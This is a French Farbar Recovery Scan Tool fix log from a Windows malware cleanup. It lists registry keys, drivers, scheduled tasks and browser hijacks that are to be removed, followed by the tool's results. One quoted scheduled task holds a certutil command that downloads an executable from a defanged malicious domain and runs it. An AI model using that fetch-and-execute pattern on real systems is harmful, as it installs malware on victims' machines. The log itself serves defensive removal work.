Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 30-06-2019
Exécuté par nathan (02-07-2019 12:46:54) Run:2
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [CloudNet] => C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-01] (EpicNet Inc.) [Fichier non signé]
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {1cdbc928-7ae7-11e8-8f04-309c237de986} - F:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {77299983-6ef2-11e8-8724-309c237de986} - E:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {7729998e-6ef2-11e8-8724-309c237de986} - F:\Install.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {bc299b7e-6fe0-11e8-9ffc-309c237de986} - H:\setup.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-06-20] (Google LLC -> Google LLC)
BootExecute: autocheck autochk * SmartDefragBootTime.exe
GroupPolicy: Restriction - Chrome
CHR HKLM\SOFTWARE\Policies\Google: Restriction
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKCU\SOFTWARE\BDEsoft
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ECC86769-7F66-4B10-8F5C-9236014AD6C2}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{EA422745-2A59-4210-9170-FC0F681D690D}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B9306A65-8495-4668-896A-47A6EBC63B64}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B46674A1-E065-4ED0-B455-C03D8FCF3124}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{0DE91D78-08C0-4B2A-8131-6D960DF45E00}
C:\Windows\Installer\57f7ee1.msi
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7665F26F-D11E-4498-A63E-08137544961B
C:\Windows\System32\Tasks\csrss
C:\Windows\rss\csrss.exe
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Machiner
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
Task: {75F6A243-14B7-4B77-B1E9-6CD40BCB2166} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://fstyline.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {7665F26F-D11E-4498-A63E-08137544961B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5161472 2019-07-01] () [Fichier non signé]
Task: {F7E55B26-44E1-46ED-BC51-75E09A93BFBB} - System32\Tasks\ewSXxaflLkNov2 => C:\Windows\system32\wscript.exe "C:\ProgramData\xpekMjRorgkcLnVB\HcCoFUY.wsf"
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErR1DGytAxJ2NzqtF9dPANsNo_Onure0_Fi6qpvpBxdx9emiUVWOlHKghequCMhfWmFpRBhKYPOHulyoCeZNXQ-rERvXwcj9kxg6BhDwMLSkriFhHFainxVFBHBDcoHt-kkQve9GzHO9fzvkMgAuqA2giNUmbClselIu9JNlNyhJA,&q={searchTerms}
CHR HomePage: Default -> hxxp://www.funnysearching.com/
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé)
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [0 0000-00-00] ()
S2 AdvancedSystemCareService12; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [X]
S3 Denuvo Kuser Data Driver 1.0.0.7; pas de ImagePath
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] ()
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider)
S3 AscFileControl; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileControl.sys [X]
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [X]
S3 iobit_monitor_server; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [X]
U3 MBAMService; pas de ImagePath
2019-06-29 11:34 - 2019-07-02 09:16 - 000003184 _____ C:\Windows\System32\Tasks\csrss
2019-06-29 11:34 - 2019-06-29 11:34 - 000002890 _____ C:\Windows\System32\Tasks\ewSXxaflLkNov2
2019-06-29 11:15 - 2019-06-29 11:15 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-06-29 11:15 C:\Windows\SysWOW64\yzrnpmcu
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA [16]
EmptyTemp:
*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => non trouvé(e)
"HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valeur restauré(es) avec succès
"C:\Windows\system32\GroupPolicy\Machine" => non trouvé(e)
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKCU\SOFTWARE\BDEsoft => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ECC86769-7F66-4B10-8F5C-9236014AD6C2}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EA422745-2A59-4210-9170-FC0F681D690D}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B9306A65-8495-4668-896A-47A6EBC63B64}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B46674A1-E065-4ED0-B455-C03D8FCF3124}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0DE91D78-08C0-4B2A-8131-6D960DF45E00}" => non trouvé(e)
"C:\Windows\Installer\57f7ee1.msi" => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)